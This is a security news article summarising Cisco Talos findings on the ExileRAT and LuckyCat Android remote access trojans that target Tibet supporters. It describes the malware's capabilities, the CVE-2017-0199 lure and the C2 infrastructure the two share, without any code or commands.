Cisco Talos has identified a pair of Remote Access Trojans (RATs) targeting supporters of Tibet. Interestingly, they are both sharing the same command and control (C2) servers and some domains. One of the apps also contained the encryption keys for the WeChat messaging app. This means that the hackers are able to decrypt and thus read messages.
The details of the attacks were revealed in a blog by security researchers Warren Mercer, Paul Rascagneres and Jaeson Schultz. According to the blog: “The infrastructure used for the command and control (C2) in this campaign has been previously linked to the LuckyCat Android- and Windows-based trojans. The discovery of the C2 led us to identify multiple campaigns being hosted on the C2 using the same payloads, configurations and more.”
This attack is clearly political and is aimed at those who want a free Tibet.
Why is Tibet being targeted?
Chinese hackers have regularly targeted the political supporters of a free Tibet. This is just the latest in a long string of attacks. What gives these attacks more prominence is that this is the 60th year of the Dalai Lama going into exile.
March 31 is also the anniversary of the establishment of the shadow Tibetan government. There are a number of events and protests planned to happen around that date. The attackers are almost certainly looking for information on what is being planned and who is involved.
RAT 1 – ExileRAT
The researchers started out monitoring malware they have called ExileRAT. It uses a mailing list owned by the Central Tibetan Administration (CTA). This is the official Tibetan government-in-exile organisation who promote a return to independence. As such, it is a key target for Chinese state-sponsored hackers.
The attackers are also using a presentation belonging to the CTA titled: “Tibet was never a part of China.” The original file is a PDF published in November 2018. It can be downloaded from the CTA website. The attackers are using a version of it but have modified it and share it as a PowerPoint slideshow (PPSX). This allows it to take advantage of a known vulnerability in Microsoft Office – CVE-2017-0199.
Once executed, the code downloads the ExileRAT malware. ExileRAT grants the IP address of the machine along with other data such as username, drives and network adaptor. It also allows the attackers to deploy new files and manage processes on the infected computer.
RAT 2 – LuckyCat Android RAT
The second RAT seen on the C2 servers is a new version of the LuckyCat Android RAT. This has also been used in the past to attack both Tibetan activists and supporters of a free Tibet. The researchers found that the update malware is able to execute apps, record audio and steal personal contact data. It is also able to steal and delete SMS, call records and location data.
The ability to steal SMS messages allows an attacker to use the phone to get around two-factor authentication solutions. By intercepting the SMS second factor, they can attack bank accounts and reset passwords where 2FA is used.
Are both RATs owned by the same attacker?
This is highly likely. The shared C2 infrastructure is just one indication that both RATs come from the same source. When the Cisco Talos team looked closer into the code they found other indicators. For example:
- Code features share the same names
- Blocks of code appear to have been copied-and-pasted between the two RATs
- Both RATs share malware domains that are using the C2 servers
Enterprise Times: What does this mean
Hacking attacks against political opponents is becoming commonplace around the world. What was once predominately a hacktivist operation run by often disorganised groups has evolved. Many of the attacks are now carried out by professional groups who are often state-sponsored. These two RATs bear all the hallmarks of such a group.
While sharing infrastructure is not uncommon, the amount of shared code and close alignment of the two attacks is interesting. It shows that the attackers are not relying on just one operating system or device. They are also targeting geo-location data from all infected devices. This could well provide the intelligence for police and other agencies inside China to make mass arrests to stop any protests at the 60th anniversary of the Dalai Lama’s exile.
There is also a message here for Microsoft. There is an irony that the code repository it purchased to widen its developer community is also hosting code to exploit its vulnerabilities. It will be interesting to see how Microsoft reacts to this.
Will it now look to harden the T&Cs for GitHub and begin removing and blocking accounts where exploit code is found? If so, it could be in for a long and complicated task that may backfire. There were many developers who were worried that Microsoft would try and mine the code on the site. The company explicitly said this would not happen. However, reacting to proven reports from security companies over exploit code will allow it to deal with this problem.
For now, supporters of a Free Tibet are well advised to be careful what emails and documents they open.